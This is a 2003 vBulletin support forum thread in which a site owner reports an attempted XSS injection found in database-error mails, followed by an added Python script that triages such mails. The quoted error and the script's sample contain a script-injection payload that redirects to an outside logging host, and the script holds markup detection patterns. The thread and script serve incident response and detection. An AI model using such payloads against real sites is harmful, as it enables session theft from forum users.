
Hack attempt...

    Steve Machol
    Former Customer Support Manager

  • Steve Machol
    replied
    Immediately do what xiphoid suggested:

    Originally posted by xiphoid
    Upgrade your forum to 2.3.0 a.s.a.p and .htaccess/.htpasswd protect your admin/mod/ dirs and change all your admin passwords.


  • mindbuster
    Senior Member

  • mindbuster
    replied
    Ohh, ok Beorn, anyway I edited the links out.


  • Beorn
    Senior Member

  • Beorn
    replied
    EDIT: Ignore what this said...the script contains a redirect to the referrer....
    Beorn
    Senior Member
    Last edited by Beorn; Sat 31 May '03, 9:48am.


  • phill2003
    Senior Member

  • phill2003
    replied
    If you go into the admin CP and look up your name on the user list, there is an option to change your password...


  • mindbuster
    Senior Member

  • mindbuster
    replied
    xiphoid, sure, changing the password is a safety precaution, but could you explain what the attack could have done? Could he have fetched the encrypted password list? Is that why he signed up as a member himself, then changed his password to more easily decrypt the password list?

    Where can I read about changes from vB 2.8.0 to vB 2.9.0?

    And btw, umm, how do I change admin passwords? Within vBulletin or the admin UI?
    mindbuster
    Senior Member
    Last edited by mindbuster; Sat 31 May '03, 7:01am.


  • mindbuster
    Senior Member

  • mindbuster
    replied
    Umm, maybe I should be more specific: the vbexploit.php file is NOT on MY site ( www.hitman2forum.com ), I have nothing to do with the http://george.modders.net/vbexploit.php?Action=Log site, that's the hacker site.

    If you try and click the link to the hacker's site you can see it just keeps refreshing.

    I looked inside my members2.php file and there are no traces of any link to the above mentioned site.


  • Floris
    Senior Member

  • Floris
    replied
    Upgrade your forum to 2.3.0 a.s.a.p and .htaccess/.htpasswd protect your admin/mod/ dirs and change all your admin passwords.


  • Equ1n0x
    Senior Member

  • Equ1n0x
    replied
    vBulletin XSS Injection Vulnerability: Exploit
    Coded By: Sp.IC
    --------------------------------------------------------------------------------

    It's NOT A VB FILE. Suggest you remove it, and execute who put it there.


  • Icheb
    Senior Member

  • Icheb
    replied
    vbexploit.php is no vB file. What does it do?


  • mindbuster
    Senior Member

  • mindbuster
    started a topic Hack attempt...

    Hack attempt...

    I checked my email today and had gotten 6 mails concerning "database error".

    Someone has tried, dunno if the person succeeded, in hacking/exploiting my boards.

    Here is one of the emails with the errors...
    ----------------------------------------
    Database error in vBulletin 2.2.8:

    Invalid SQL: SELECT thread.threadid
    FROM thread,subscribethread
    WHERE subscribethread.threadid=thread.threadid
    AND subscribethread.userid='1071'
    AND thread.visible=1 AND lastpost >= 1051784537
    ORDER BY lastpost DESC
    LIMIT 0,><Script>location='Http://george.modders.net/vbexploit.php?Action=Log

    mysql error: You have an error in your SQL syntax near '><Script>location='Http://george.modders.net/vbexploit.php?Action=Log
    ' at line 7

    mysql error number: 1064

    Date: Saturday 31st of May 2003 12:22:17 PM
    Script:

    LINKS EDITED OUT
    ---------------------------------------------

    As you can see it was from someone at...

    Edit: I have removed the direct link now after Beorn's post, any admin/mod can msg me to get the links, the dude's email address and his IP address if needed.

    Dunno if anything has happened or been damaged, or if the exploiter got any info he shouldn't have, as it was member2.php that is listed in the mail.

    Could anyone tell if it has done any harm?
    Should I close down the boards?

    Thanks.

    /edit

    Update:

    Just found out that the exploiter actually signed up as a member on my boards so I have his email address and IP address....
    mindbuster
    Senior Member
    Last edited by mindbuster; Sat 31 May '03, 9:52am.
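
Added example (not part of the thread and not vBulletin code): a small triage script for database-error mails like the one quoted in the opening post. It flags mails whose failed query contains script markup or a non-numeric LIMIT clause, which separates request-supplied input from ordinary schema errors. The two sample mails are constructed, the host is a placeholder, and the function names are hypothetical.

```python
import re

# Constructed sample modelled on the mail quoted in the thread; host is a placeholder.
SAMPLE_MAIL = """Database error in vBulletin 2.2.8:

Invalid SQL: SELECT thread.threadid
FROM thread,subscribethread
WHERE subscribethread.userid='1071'
ORDER BY lastpost DESC
LIMIT 0,><Script>location='Http://attacker.example/x.php?Action=Log

mysql error: You have an error in your SQL syntax near '><Script>location=' at line 7
mysql error number: 1064
"""

# Constructed benign mail: a genuine schema problem, no injected input.
BENIGN_MAIL = """Database error in vBulletin 2.2.8:

Invalid SQL: SELECT threadid FROM thread ORDER BY lastpost DESC LIMIT 0,25

mysql error: Unknown column 'lastpost' in 'order clause'
mysql error number: 1054
"""

# Specific tag names only: a bare '<' is a normal SQL comparison operator.
MARKUP = re.compile(r"<\s*/?\s*(script|iframe|img|svg|object)\b|javascript:", re.I)
URL = re.compile(r"https?://[^\s'\"<>]+", re.I)
NUMERIC_LIMIT = re.compile(r"\s*\d+\s*(,\s*\d+\s*)?")

def failed_query(mail):
    """Return the SQL between 'Invalid SQL:' and the first 'mysql error:' line."""
    m = re.search(r"Invalid SQL:(.*?)(?=^\s*mysql error:)", mail, re.S | re.M)
    return m.group(1).strip() if m else ""

def triage(mail):
    """Flag error mails whose failed query carries markup or a bad LIMIT."""
    sql = failed_query(mail)
    findings = []
    if MARKUP.search(sql):
        findings.append("markup-in-query")
    limit = re.search(r"\bLIMIT\b(.*)", sql, re.I | re.S)
    if limit and not NUMERIC_LIMIT.fullmatch(limit.group(1)):
        findings.append("non-numeric-limit")
    errno = re.search(r"mysql error number:\s*(\d+)", mail)
    return {"errno": int(errno.group(1)) if errno else None,
            "findings": findings, "urls": URL.findall(sql)}

if __name__ == "__main__":
    for name, mail in (("sample", SAMPLE_MAIL), ("benign", BENIGN_MAIL)):
        print(name, triage(mail))
```

A mail that comes back with findings points at a request parameter reaching the query unvalidated; the URLs it extracts are leads for log review, not links to open.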